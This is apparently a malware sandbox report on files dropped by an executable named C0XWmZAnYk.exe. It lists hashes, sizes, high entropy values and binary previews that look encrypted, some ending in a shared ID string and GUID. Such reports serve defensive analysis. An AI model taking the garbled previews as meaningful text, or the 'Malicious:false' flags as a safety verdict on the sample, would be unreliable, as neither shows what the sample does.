              SHA-256:05C893DA91E3D0BD0B19BD06634D3C9722535E7DCE1934A08996A68574EF70B4
              SHA-512:EDAC403969DF31C3C4FE205F3B090D03EFB50166839B3EC3B8A835B6BCCA878A29D7415702558EA64F0B7E8CEB14C07A77F0E18AAE2FE5A38C227196461282A5
              Malicious:false
              Preview:QFAPOP....s...#"....*i.X|.b...8.GG.+.TQ......x^@..gHt..3.<.k.I.|.wS.G...p.).k.kN.......9........%|.../..o..[...N9..$._#.4Qh.RSa_e......t.?{&*.....{....C\{$H;Cx..^$.WU`.3..6V.z_\H......d]<i....M..!..'S,+.P...w...G..K..N.(.r%U.*..\.y...<...,.A.......@...Z.....2A...j....f%Q...).+T...-r..-n.+......=...k^.t....@.....]....:.-{=t.V~a..~).n....3.ovET.L......sZm\p.R...-z.Z....B.o.?..",...p..B.%_..Hg.^..N<.Q........h..I.i....0x......A.'.....x5...@.j.)..&..`...&.~........P.n....K$.~.\.F8.M}..~....%...*.....qK........c.-.J../.[{A..;....G.........k:.Z.K........?.;...O..rN.(6f.X..t..p$.k....#.T.2+...S........b.....L.~.N9..rmb.W.u..,N..'....#~4O~/..x..*n...}..w2'$.s.i.U..}...y.X-g.q..C.%....A..".>.v!Y, fL..5HLC|.8.2.7es.i.&.._t2..=,....b3.r Q~..YhF.Bg.k..I....H...$.6....E."0..RS.V&.!.1.b">....%n_J..\.@~6Fo...$+BC.Qv(g.z..j69......9....G'3V.M.t....i!.,.dk.^$#..2r.^6..y.?.Bs.p..T...2......!..S.2..H7.A-..B..C^..&.y.........L.o.. .....y.t._..'~Q.^....z.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.831635369270972
              Encrypted:false
              SSDEEP:24:o2WfsekuFtRGbVghlvCE05pVcfhnT5i8KIM1D2YYDTbvDR0JnjMtoU32I3mfU1ky:lysekuhGgT905vcJNOD1DXGzFOnYOU3h
              MD5:5BEA7E98FA04408BA8F88ED4617040B1
              SHA1:FD0F8671CCA488CE5FE518C25A3A04758F35948D
              SHA-256:803A9B6EB9DEBE3205C2DB1768E9E8B3EF617C6807CCB4FA720B9C3A43B51A77
              SHA-512:9D6C7E517822FFAB4AF295AE1623BC29C5D189F75599C4F2D68973B2EBECE32DB8E30F2A36DE9E1385462265BC1D4C15DC4BFF2CD80CC91768322AF88CF8670E
              Malicious:false
              Preview:SBVUS..<.+qd....6.RS..G..}...|..#4|=....v0.....8^..J....U.**..9O...YOW....v... |..#.?U#VD....q..9O....J.z...Z$.}..9p......mf.b.@.`y|:ws..8...~....z...w...>.W.IU.B.......c.^..I\Q........h.....+.1\z..n..)...xi...5.....O.u..(..n....,..~-0.x4S........A}.{W#O.1.B.u..]..v..<.x...H.>.6.M.>W.=#9..W.##`E|Q..|.UX..i.....F^)._"..C..*f...e\......R....u.4.j(.A..0.......|M..I...U..,I. .?....O..,n.l...=[.....b....}K.(8'Ui/.%-a...*..*x.S.,.av.z.../u1.r....../:./4./....K.{.DP.~.H."I.........1pc.).jF.N.5.%.L.g..B>..N..YN-.*.X.\.x.fs.D#jW.5;.s.....Y.\Z......u.W.......|...".cE...CA..O`..Ob..7....=.j....]*..w..h vo;........3..m.a..c../.KF..PtN.....c.)sT..l.....&Ay..%......f.@|.o&@.H.4...bB....O.K...e..z.U..).e...5).x....1QP.(..#.....<,S.0..^..!...b..}...'.l R@n.....-...?w+%..%r.L7..r-......^:.z<..(Z._S.R......9.Z..U,ut...$p..'........!7.>>!7.u.f`...p3Dg.Q.U.........;[J..CQ...).g..'O.`.-N..I*Y7"....W)y.m.....#*.4K..|...E..d.];..%3.{.d..L......,.anOvN,....U0
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.864590556276799
              Encrypted:false
              SSDEEP:24://2rAjbX2nDcHy+XNHki3txRprTtANbpFnLP5nF+ht3WUmJxkFzFHoFld+bD:HdfX2nuyghXRBTmNbppBnatRmHcJHoR4
              MD5:B19C6A2C1181AAC5A3867E5E155050B2
              SHA1:F5A39C710C9CF4C409A071203F275083316038B6
              SHA-256:635548244BEF15EFBA54A275B0C883329CF47C34D9651531E549C69AC58C4193
              SHA-512:550CE0CFADE84F19B93940F3526A16447E58F174108C968F907A4D10A677C4651BE46CECA226CACB2C3678633F8AB2B5FD576B4ECC2EFE49943C4E88BCB515F5
              Malicious:false
              Preview:TQDFJ......v)......q..Z...C.....j.+.....i....*.......?.......Y..=..:...@5..Q..KnL.h......= Pe...l...!....>j.?..d...<...s.)..*=.){. .....7.t$..L|.F...T....Dx..0R..7..I...._4!b...1......8. ..L..m1_EFc...O..J......8:.......\.oLgV).:..,\...o\..U.HK.....VO]..c>!..S....$...t..V<.&.0.r.C..\M.%..}.....G_7......TT...N........._.C|ys&.U.>.. ...YO.|...2f...KR.........T.Jc_....p.^.S.+..h.....q.ySp..8.I..`..[Y..1..a..*.=....Ds.a...%..9.x......ui...]Z...7.d..C....Q...*...K.MV.v...TL...HH....?...~&...Wz.A._+kZ.}.6.........p..H.H4.t.f.X.u.W..G.V...!...4tG.?J.MmB.]{.......1...t.?8b`Q..........T.0.P...f;..5.G.o.tW..j...P.J|..u......\.p..................x..c...6h...i...C<(..t7......N.RI..Y[..hK..D.B.....!...k.....c......<?g.4...~...8.\<E......e..w&P....n.}>..ev.....w.....a2U..TR.HY5.o.i.B"*W8....+.d.eq.....-..@O*.WH%Z...F.^.Bzy.w..X...666........(.Mh.8..sJ7.3..^.p..G.Qd...`/.sx...7_.......ARR.0.."......6..B.4.......2}..#......x.U34...`...f.!.+.3
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.853733681955026
              Encrypted:false
              SSDEEP:24:36EekfPf869+HIabWe1UqX7JYqG9Gu6RZiFzfqADXV3h1CPSa3+fbxm4died+bD:36wc68BWe1Uay5kuSZiFzfdDXVaPSWK+
              MD5:297325F363EC98D65679E06B39855E67
              SHA1:5F80D78D4EF557873940CF72913E3D8FB2FCBA30
              SHA-256:A123F490F6AFABBB9CC8FA353AB4B824A12C3B0D8B4A937F789557FF02C4C39E
              SHA-512:D6505A580D34CE35A1D05C36DE0FA962B15C82D7048B409178D1B9A702C077BE94BF8B1AE55E6F259B4D1D99D280D2C5B3809F0963C56A74FD0B1FC04636F394
              Malicious:false
              Preview:TQDFJ.E.QG....:)\.#...x..7.2......XYv*..?9.d.X.PC%...w.}..}....$.;..9.-=......*]....a...R.Q..Q......w.../t......6I...=.....9...Z....S...KtX...xm<8...M.........../b.I..#..j..h...=...2.y.@q...w....B.l...@.....}8B.f...p...-.|......S{+uf.:..8...L...Z).9....(..RS.....AG.8...D{.7I.\...>.....G....%.M.q.5UW...@.x&.z.N.t.(l.4....0..X`....=..:.bdZ........Ywx0..08...;.(,.....p.D.qo.......|.I...dq0..]...[.......Cx.)..4.|...G.x....$H/zJ~.Z#5l.!..*..P.N.(./...@.v.WG. rx..._...6 ...l.<nc...l...y...M.F....o.b.........e4..j.......2.&...I.ym#[(..Z.o.,Hi,.#.<mV)^M?K.L .$._. X$..j..}.I...f.u..-K...k.e.0..ow"95..`....O..Va9.{Cl.[..S...b8.l.cF.Hi.7...3..&'..|i?P.$.4..A.x.[.a...#...#}..X..7.&..c..!1..........].}.....V..Hd_.......V.._6._ ..b.k/9j...g1..0..(..f.*..0..W...I19+u..h..:.S ....e..(4E.x......n...\.2W.c9..G..d9.@.q.7.*.e#.s...53.!.....H.'....j.^.[.W.h.v......[y......2...n ...~.....P6..../T...y..|Y].bY...F/.A.....EI~Y.HD..i..g..k..x@W..2dh4R..|....U[..7b....v..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.844995040435364
              Encrypted:false
              SSDEEP:24:JJIQDPSgpjnMutnZQqkC4ekepaOjA9bYZ/xsh9y34SckrIaIjDK1WA0xQqd+bD:J3PSg9nMutZQQJnaNY+D1KxYm4A0xQM4
              MD5:2F972D96C5BAFC1C80D39C89895F9FDB
              SHA1:38A204B5A9AB1DC1B6FE54A9FFB3028FF112307B
              SHA-256:0A1CBFB22193A4BA9279B09E5307BA092F2863A9264C328C29D8788A97A89BDA
              SHA-512:FCE76AF6D356976143C8124A12D47BB65150F3747E5E9AA171856EAC1FCEC942F15E66CC9B7390476718EB1D7EEF01CB1A8A98EC39909C6E341891A720A3E7A5
              Malicious:false
              Preview:UCKFKg$[R.C....Z...i.......3]..M.w.....,.\..axGIH....{#.~.+Y..A.+.5I.fm..S.a.\$}..p...lI#.V...x...j.;.^O(....V$......,...bje.+...M.0[..}.M.Lb.@.l.....EY[x.q..!.-W..5.Yb....$..r....~5..PQ.W.g._Q.).2Z(4...9P...kR.^8$P.m.xJt...5.I......K@.Lw`9"..r.)..."..Q.......IH].g...,"...c.q:...b.j..LR!..`.N/N..Q..PI.....F...d%(.....X.....W}?|qL....jv.I...T5*)G2Z.......D.,m^.]..0*..<..Q.AA.^....._.5!..H..s....u(...*..U..s...T....1K..'$.u..".r..(-...g.r.Y....b..K...\..&.Jz....@...b.oD.!!...K.6.l.,.F,D.:0..Y.&...}.JK.5^...i.........~lpU...,Z..._*.6..JN.4w$.....h...X<p..b...3.K.O.J.4...;.....".I....Oq[...@...2...4.../^.@~....J.s....W.....;)..... .ZS1.^..G...I.b..)i.;................75iL..{...Eu.q....W.....qn.....<.U..[NE<0{.".R>83.z....A_..........nX.b.8}.u.......Y.w#.zFw...P&.Z.kFD.-. ...l=...+t.^R.J..o<...0..S*..&%.U...!......35. .!.Q.]NO1Tb\#...An.p.B...=(i........f.WZ..B.0.u6.(..."z.;c'/4.y......wx..(.n&..]9.....e.............o.L@..zK.g..QJ..W......
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.855231440082981
              Encrypted:false
              SSDEEP:24:PuLxUztyP4c0VxOYeiKh/RIqUvSlXXVxo7g0iww2uMgj7Ueu32dMXwWzkdBxvd+X:2rknxe3RSQjAg0iwzuD7UwInzaxl8D
              MD5:FC13ED20A8C73C783F3F91AD19A81EA4
              SHA1:A5B70B8EBB0F3294F7D2FDF37D450DD9154D7CC4
              SHA-256:AB1E59D33F7F7734A5DBA13FEA1D7704723AA968697624E5BA780FAF8B1A9DC1
              SHA-512:3AB55ECB5D9ED56385A38FDFC042924B995AA31B9B21660C4E194C142940D5D72E8F8A809E3FE37F06E0FA78D09D13FE0670E732F21E232E521E5F23B4D87E51
              Malicious:false
              Preview:UCKFKENT....o..X&|.(.G..W^F..h>'. .w.......o..8r.A.bf.^....D.p....0.[..sD...d..\.r.I.v,.qB..-.a...@..Z2.B..cV.+..,/..4.......|_Tz...0I.7.u.".2T..X)..N.6`......e..&...u1>Z..O..r.&.m..~:W.U7.. .8K.y.l..Q...t...0..c& ..t..)-(.....6..n..B...5...#:..'>.4I..y.}X.B}.....&....^(......No..C..f...CQ."7.../..V..U....j(....!*|~.N.P..fM..'..1....QtB.M_......S.....N..m....dp....E..[5..3................>(A....)c.....!..Vl..B..b......l....Y..$.q...C..........l......%~..^.D._....o.I.....%-|.Z..880.({...} ....Y...D[.....4q.I..............N@.....n.8.B.D...x.>h..s...r.X...)`w..*H.....v.....n/E9!H.lo......q.[~.j|...,....e...R.{,S...hF.g...8L.>..3.q..R...Ma.....v..U.i..,....LN. ...fr..9.!..AX...=.~..+...g..R....n...J..[......8.k5 .g4.~..).l....HCy~.......!..@..B...#../;.R.;. .K..^HL./...j.....J.O.o...6T.5.?...%?...-$M?Jj}C_f_6...4.. ....>.\#....!....7x.nz...HC..o........Wo y8.......Pe9.".....!...x...qDF...|d.i.5T.To...]O<^_...{.s....p..S...2.:..S....3.R
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.827566026705209
              Encrypted:false
              SSDEEP:24:VepvII5Ak/xp457XRKzbxhoSXcV0uE7qVGRED+CKCPmSN7LojdEISTsEolLTd+bD:V0II6kxp457XRKpyq6xeEDwmj7LUdEIK
              MD5:F678CD814C999A50EA1D7EB094CED00B
              SHA1:1ECF3E30347A4F4064300BC0CEDF1D33DD317614
              SHA-256:15F16802CB9E0E9CF805C27BD237E535B3320B6E731B131E7989A5DFEE5BC32F
              SHA-512:C6B3A3B75CA86296728092C47FE5AADB1AA930056B6639E8602EF07A57E118282E4FB2096419B8C2540FB1840D50F6FAFC418FE107A9678444EAB2A60AE6F751
              Malicious:false
              Preview:UCKFK.~......FBa.2H&]<..x.Oo'..I./.g%.._..(.i.....k%2...x..X..L'r.l7..'...HNK.....0)o#4....Hu....{.r....n%.....|%.o...\.A=...?L..p.x...@.!....K\.Y.C\..[....W.F..,OL..o. ..j9.7..u.6..2..;C.....Mp./....e.R.26.a.Q.....n.3U..b...A.78......-o.....^!........^E.....9.PS.V....$/..]H.:.H.[..f..a...d..<!.P.P...Ah.|.5..uKlQ..\UW..0....(7r.1N.g/a..^..........N.q.Fx!..z..q..#LU{.+...B..\.N.......XL..e..9..r+,>.......$...H.#.....-...WB.MH.@.U.C;..w...y..R..T.y.....b.1`..{....:..~.-.* .w.....>.5.....t..|l..e7...l...8.x.c}..D.0.Go@....K".=..$.K......9..9'.9.]'..0.Q.c.+....%:..$.MGB....e....s.f....^.'%...^~!.K...V.2..p>..M.j...}J....a[....>.......L...OK..gl......'t...T...8...Hf....O?.8@Z..o..H.!..d...'<l[....~.:.A1......2c...R....O+.........r..~...H.....>.(....c.........X5.>2.....}J%I.....Y.M[....8..(....<yK.ts...kr.q.......I.....oZ...P.S..?}Y.L..Q-7]I..<.X3......./.....].Z..$f.^.....$Y[.s%.vv..O...h.....x..QuZ\.{...N...}S6.q.p.=.q.....H3cs...]G....N..t.r.@.$....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.8663218633522725
              Encrypted:false
              SSDEEP:24:XkKNxNKai1h111tbTAJsmtyPjhFyg1Q/yL6k1v726yH6jOomqS6Ypaz5ftIZ3UH2:0KHNZILbT+kjvyle1Z726pjG/WSZEHEl
              MD5:BE53D79CF791DFBD9A94B5CDBA03ECC2
              SHA1:7D2BCAD578BD0718128E25EB7ABFCE6FBA7F687C
              SHA-256:2EA24C3A7221C449C934CE52212F9494DA0DD41FFA064DAE7D12F8B4E0708623
              SHA-512:C9823AA0474DCECE801A8E68CA5DA9351B935ED440B71A481D7083797BA437CE86E99DA53A3AEDB6B1A0A6C63657EFCEC7EA2861225AA13EC72737B2FC959BD2
              Malicious:false
              Preview:YYTXS....L..R.J....=....m^...!i..r..g.P.CG<..v..)....kR).9;l..h..*..`A..sC.D.%c..D.J...h..z....>..F.W9.'..".w...k6X'.Sy....G..)L.......0.R..$9..;..t.l.R....mP..i.?..D..^.m..9A.2[[4.[~.......k..;KE..K....H:..u.].H...q....wb.,....x(.....j6.~5..ht%..j..fr*s&..N.,q...m..@...n..m. r.....e..h...J...i......u..?.ElK...-..[.[.c.oHr:g.k.gv.-.V..6Pf ...4.'d.c...".D.......C'..L#..Wqz..u?.qyh_..H.......^.....eU<.F.!.\.j..:.(..{.......ke.ZB.X..-.1..}6...*.[C...dh.!.p8...)5FB.,..;....L.1.'.F!.......X.m..%...}...#3....##.2..g..1.g..-...g|.k..C....:..s....u;$......o\...u..(..&.....P[.*...iLcN,....._.QW....*..%..-. Ba.-..t........(....T!...m...a..G....y.m.CI..Ry...=.Jg.O$.I9...xh".I..*b..,.1.f.....t..=*...q...y..+..0%.U...@.t$....d..h...+.....At..Q&.^.[i....ZT^.UW+...!...IW...........R|..2..e{.T....UA...IY$X...6._..'.....Y.......Fw.%".......|8......:41K...?.....-@A..a...?Q...o1..;......)...}...n~o....!....,__.{..*.m.A.2^.'.L.ub....z=.2RJ. .2^....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.850348668836958
              Encrypted:false
              SSDEEP:24:iDG5+UdopxBoo21CT2UJ7RkLyLMcEgttNM/3n4uKaRrIkVMCoKd+bD:f5rdMv213LVjAa/34RGrIkVMCos8D
              MD5:4CE869AE3BB5C74702255E2A0388819E
              SHA1:0CC3E86C05CE5906FD8D9BBF0E7266BAAD822F76
              SHA-256:9B2E1A3142122009BB89F055B2AFEEBCDAE1C7012C1657B8D24C27A19135B942
              SHA-512:15E89672D7AB44494E815C30086F93C8DC85149E7702B1E387761460F8845D5529595336581A509F8C17A13DFE0D769FA62C7857D784CC83B879A66E7A3CC289
              Malicious:false
              Preview:ZYXFL]...:.(.I.}(.R.pm.x.0.C].y..-vDy.:.......@.mD@;p...Z#...G..D...g.*..p...t..........QG...(...m.O[..[.n.t-.J...*.W.!.Z)N.}&.9,..MQ....nv..%......'..b.p..xV..N..V/.L.. j-.._.ML..........!R..D?..g.....)1<....a.F.;...[.<........"...ve.K.|{H./.....".2..(~.<...M.=......x.>..`..:5..C..">...f..G-.1t...%C...P.3...=.q.R....=.R..jv#.E..k.Et0.y1.Z.i#....Z...'f1}...Y#[....h....`.2zG.S83..*.*....... .h.j.....l.......l#.....xb.YY.aMk|...}s....d..H0+.,.RS.K.k..!...q..N....i.......?...R.Xftb$(......D..q........#.q.Q..{..u....,yM..;BbQ"1$w...s..q.+.......c.i'.....G.Vj.Sz.%.ux+8.....Y.I.tm..!..0mS..5OY[.^.^E..G...~.I.gy...K4v.].K.3.hS`.V........_..%U.8..6^..~...gW.3...7..M}.Y...,^....s[k....:.}X=...r.~z.#1....Z.$....k.aA....r.<.r.0q)WZ...Z.Hw.]p..C.r.0Yc.`.b...:..7;......b...f..6.......E..!*>#K.QZ.03.a...JN.0.4...4.A.....q....+.J..9N...R.5H.noO,........J{....<..ZJ4.].C....X..`..jV.`...E<.*..8R..?s.,|B...ey\...hF...]....S...R.j1.l..q...ukW.u
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.845079166445456
              Encrypted:false
              SSDEEP:24:nNse3rjtgLemKJhIBPnJkEOjJtURlWJLHYNQuJh0jLd+bD:NsOjtgLeNhIBnJqVr4tyd8D
              MD5:4FCB4605E100B7076CDA12952EF43AB2
              SHA1:EBADC260D7FD43F58B1819C0AD1CAFA655520A9F
              SHA-256:A826224CA5CEE3AA9E01984F00EB2836AAA369E1FB7A4824B677F47543CC3CBA
              SHA-512:808CE2F32ADD844F7033DB1F63B17F2D89CC4AA8637E0A966E7338CBE1EB70C2E6881BAF59D094213A667C22CC81F1573F764DABBFAE8A39B72F4D2751403A76
              Malicious:false
              Preview:ZYXFL3..hP....R~$.......T^..E.p....r.U*.."..Sr.+E.n...F....aj.nV".-.u..'.w-g...LC....Z....?...".v....n..^.#..@.../.Z.....gbhcT.#.N..D......{..AZJ@i.. .U...y..d..V..... ....a....*2.......>.Ud........L...s.3....-3..o9.fX.g&;....}.w*.4}.I......_\Z.%.A..\...cfr.a..DL..^...]uIc.^.F@QS...;X.3.$.\.$.epjUZ$...B....G.tT.BCb_*..Y.vc(6...7T:;....^o7$$^........8..3q...$l..F...p...F...^.E....p....z...O...H.0..C.....(...lj'@.C.g..ZK>F>a*..aA.#`-.k.EkxiA. .0..ab...$.m..0TzDLW;...?...........k...yt..!.....B..........,......)-...u...G..+..../[...[.f....xq%`.M....)2u..m.Y..c2E.6........@.)6...J.=06....~.W.4B.W.aKh..m....a...!y.O..i."....-..F.x.w.3. ..&.[&(....I.$X?.t.......,..O@8..R%=wp.".f....L.:.....I.....0k!.../.......Lf.`h...8.T>..]v_...)t..........7.l.!?.}.~.h>5u=2.I[R..{...G5.X....*..@J.N........5U.. qFj.`0.oW>eIh...'5Nx.V.X.ZP$ .c.......f..*...*.Z...m.V..z,0..^<.M.p}..z.GXZ..J.....&.R...Z...z}....O.b}"....&..P..0....9Q1......L..n|.9.._*...gkD..XF..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):18715
              Entropy (8bit):7.989814073581199
              Encrypted:false
              SSDEEP:384:YETN5ADcBCRDjV69z7zoBU4qNExGCHWAxRRLURiQsW:LTNyvf69PkU5EgC9RqRiK
              MD5:6261A4AEB9602BE09B086576CC9FACEB
              SHA1:EDCE4223DDBD16F744A342913022368E64FEC724
              SHA-256:AF55243731EB05EF772F481E5D8986750BCD5431CCD2F352009D27ABF2D6DD72
              SHA-512:3357D5E67983C0F06E170CF6CA9863773A655F260D105A7A683E996676CE20D645C34E199C116C7555A643BAE5FC58B99893DF6AAF057B7E10847CB3770A9C50
              Malicious:false
              Preview:mozLz.n.9J....E..k..X..$&.MA./.q(Z..g.xPE..]`.W}~v.Q]..y.Ci.v^......Y..Vj._.o.........e.....k]C=.H.......h.S.....y.&M....WH..us..\..H.7..6F...T..c|...M.K(y.#......b/...0E...($.=......!.......8>.....U....3.-.......,..Y....S..cCms..Z.........+...l..#..(..g...B>........sr....{[.n..&..3.n....y..._#.s...e.....91v..h/...~~.84.&......Xrs.pU}.}...@......{.=.j5......F....5/..B...Y..0...6..'i..3\9....O..1....}m./......p...........1..>T....U.."..`....a..aP.?..P7...I.O#.U.~y..z.pg.:..D5.J..z... .........D:.7.^...N./B.K.B..BR..\.4.nP.f..:.KaAi.^...F_....n...d."..a.^>d.&..!F..A..yyOU.C0..R...0B<..,.u.P..#.[.....`.....z.D4...../.............u.....Z.E m..Bk.p..C.d.....t.0{.B.4..7... ...p.q...>....*k.]....EE.........o`.s.{.Z.....aR2.N..=9>........../...)c.......8Gdz_..L..8.#.=..;..7....r..^@.;#Z...U3W......?..H..1.r7........6D3.v.......d.x.4..*..s^..|...f=.......0f_..`1........T.....$.?...b....5r......5.l..5#.m.&>.{.........R...2.....g.......#.`......y...e.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):18727
              Entropy (8bit):7.9891666859504875
              Encrypted:false
              SSDEEP:384:d/Pd7wFaSiHoLqeDaJjPKa6yG5XvKiNJOf4tbyYtNNNBx/:dnKa1eabKaC5XvZNJOMbbvLH
              MD5:8B924755D1A0082020879CBF9C9456E9
              SHA1:166E2FE1D62259D8B7FF48D23714012824ACF623
              SHA-256:4C4E0CA83D4E5EAD632932186F12FE6704C989B09C2A2433F79FDCAA8BA7DE77
              SHA-512:AA281BC9D8E7B02AD00995BF386C4F355E47FD43558B5CC5108C437A53AF24991EC77EFCEE10DE38BF82688FB10D2746CF052286A7B197B4AB25CC2E7D73492B
              Malicious:false
              Preview:mozLz.jL0..s.#...d...l.}..u.l.Q$Il.@..t..:..G.....M...........j..!".,.M.........C.g.4r..~...K......q9.Or.:.,f..I..+.q.D......>........!....?. ....WN...7....\.%.M9...5.....L6..L.o5.=.Z.......|..H...);.+...F......X....8x..+<.....p.."....S*..RQ......j...V...8S.M.2..u..EQh...].(...C8.......=.....[...5..@d.....$...p......]...:.F.}..;n[_...NF..^...._..|.............^4.7'.+..EK..-"g..Z&.].6....P....i4.l.v.b..0(..5'..,. j..&......f?.:.....ZVx._.........~.....C.....JJ."....d()k;.......F|g......}.eb.x.@.j..b[,..................p.;KHKC,..........g.%.ij.hB2...F.....0....R_..@..Jg..4....N~.,`|b..vknWGw.-5I..@.u....+M.0%hkVxo.K{|k\..\...H..d`b-.|{..<.}.~e.O...l7..$.Yu.9.H.Q.%E.;.Oj......<).d#y........[D.P........L'.hR...K..7...$C..X...4\...).....A.. {!...8......i.t.`..?.]._.....h...q..//gV...........?..... ^....Z.m. .l..Q.hH..[...<..p..v..)...E>7Rl..+{.L..s(.l.x?u.>..m... _.c.<.:...]...{.P.i... $...3.@...|.G0.7......N3i...@.......5&$.$.M.+.....h..V..5R..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):779
              Entropy (8bit):7.685387538165608
              Encrypted:false
              SSDEEP:12:wtdnzfvBOKiVsEd/Q1H5tp0383JcxA4P8Zneo9dW42xS60pg9ikcgudxa3cii9a:wt9N3Ztp038ZcxPP88MExb0UikKd+bD
              MD5:6FDBD5DD09EE8FCE9A81BE9D9EE64B40
              SHA1:5ED02D18B50D05B92FCA859083B9E0FAE288041B
              SHA-256:1A8B096C4D8FA6AA99E62B31FD19D6BCFB0C1858D1359FEB8FADF94E59D13EF6
              SHA-512:70FC3802BAED156D1916F4BC7E0DC83AA01E1185547615D277D7121CBCD2F9B2494D2DFAE858D6732F5EE6FBCD626ED7DCFF9F3BF9416DE2E93C37B90FF8550B
              Malicious:false
              Preview:mozLzr9.vz}iu..>...A.6..x#.....{..JX..?.~G..;.<c8.K..{....5...k.n.S.l!.@*.nK..*....D..`.4.1,.!V4P..Z......%....Ko.3....m......+....P..;.n.OF..":..g=.E....8......E.{p....(i...p.7..E!6...7..k..7Q..8.w..et).79{....i....Ws(...?R.....%.d.Mi.x...X.fl..9.9.06Z%.....u..]..&.{.jr}...9*:Z........+:l.....m .!M.5..=..m...`x...Q.g...$..l.c.%.[._js.C.hX..7U..o|.FN..E\.....\^..Y<.=....T.+T... H...Ge..N.Y..@P.FbGJ..}...u..._..3,@....^59.....DM..1E..}....9....f...S...~.^.s...y...&t.m.j..&....$...(...R.!s?.......5}...9..<.....r/..v..lW. ..v.'w..{.NA.s.b?......4f.o0..b.G...M.?M.s0.8..X.P41.w...E.....>T...2..M.M<.oO....O....].d......<6.q..*..s..y..s.[..H:I......B..egigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):4477
              Entropy (8bit):7.959769165413455
              Encrypted:false
              SSDEEP:96:cn7e85Dpyabxy5/1R4v5ztZl3155PJuVD6qipRtDpF5MStkvoc:unbQ1RetP31rxu16qutNF5tgH
              MD5:92203F276B50FFB0D217C83F7FE26DED
              SHA1:1E190AFCF629E0540A171EBDDCD2728712BAD3D8
              SHA-256:407190CDF66F7E5488A0C4E26D338A34A335B41C1F1C58661A157B53848B3AA0
              SHA-512:769B31C55F509B929FB58404A19C719342D3CAF7C1421C054219D1DCB4717A253AD48BE7CF7C6767DDD2AB00AC995C4D872E02A60E253CB41E7589BA7C6013FA
              Malicious:false
              Preview:mozLz.........o.c.,.k.......`p.n;q.-...w..-..*{.g...:..no......C....h..^.mL.4I..{@x.X..=O.]R..8..:7.-....z.3.........H..?.. ...&A...%.......rf.~7O.....E..X....$;..Pi......n;.=.....;......~.$..+..4.N.T\...,.x..T..;.Q....:.S.q.....27..#ae..:f..`.5C......b......9.v.-.k....f...u4.L.]...Y..#.\4...~.bz...[.....e}..e..B.l.Y...'......q...t6'...#..rhB[i.\.K.jJ,........+..R.%..~.P.O.m...CR..h...1..Io..vqM..F...:...2..?L...\-.....%-..... ....+H..I..U({g.'...J.....]^..(..iB.:...m.'_.WO...(.-..._...>.+Nw.H%-$...PqET.u.+.p.....t}p<yf.\l.A....M).2..H._y..X....^.$. Y.\f.....0.T ..=n.....&..U.J.H..b...nGQ...s(@_".:Pr..).O?...^1.~.....iT.Lk!.gOk.(....;m.cM.t.?.qJ..........mi....g._.?......du...o.d..rZ._..S&V..F.7'.O.|@V....3.b.......*.2.....D,<3.W....A....."..I.I....T.....A.F\...SJ.....N...q.S.......D...g9.J<`Z....9....}8...v..#......fu.\@..m....o..i...W:.*I.9.^.W..I.............y.c.....7h.N..;|...C.l.`.....b.5....(.u...-.Y....(..b..F...tqIn..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):778
              Entropy (8bit):7.730007903975837
              Encrypted:false
              SSDEEP:12:ANS+eLRdwiv1mWlmIQjATfPFJXxjq6k5CcZCZ5YBRkihl3WLwmQEKO9Z23dxa3cq:+reLRdWBjE3Fhs7BC4nfzEKOn23d+bD
              MD5:DA389B265F88A03C06239D1E68A59A0D
              SHA1:CD2A15CB75AC84D53BD597F4F7009CE350ACB7AA
              SHA-256:22BCBEA37FAC18DE5B2F52ABCA618FC05C7996DCA92A475DF012DEC362C1D8C8
              SHA-512:C4DAEDA1A869022E55A5EE7B006BC4C84A6A56C09E08E24A8A9B5C164F848213387434EDC8F8D1243F1D46DC1874125A589C615FA2CCD1501468120630CCAC6B
              Malicious:false
              Preview:mozLz.,....}?.............0T0.....A..#.Q.o:>.IC.4C\r9_:....=+..M.#.iQ...^M.6..1.2H;.p*...!..V;.]w.Z....../.%<..Rz.W....i9G|L.......-.........j.:....#..J^a...x........]j..........9.P..Ku.^?.......~:.IB.}...U...G..fH.X.l7...6y1I2.++.g.".6fR_WS.*.E..A.m ..g.J_|Q..<....-.AP d.yN..v..u.6..uI. ..T......b.|..g.V)%.Q.$.Y;...6/..y4...SH'."v..=DI|..d.WO.!..Ri.....z.J..17-...U9.. A@...v...cOG[..os?].>y}T..$.......:D...+.?..N.>f.]2...T..K..I..B.E.(......x..>CVr.J,..@V..X.wf..D.=un...9.t.<\}._..Q>6...s..s...e..`y..y.,o..-......ct.......Z.5.....6...Zj...GE..C....>).u.<L3.d.Kb2..B.h0 U..6.c,...<jLp.;.v.S.........7.@.MI...a.....]....Uz..q.%7......3...}J$...]%.MBH....gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
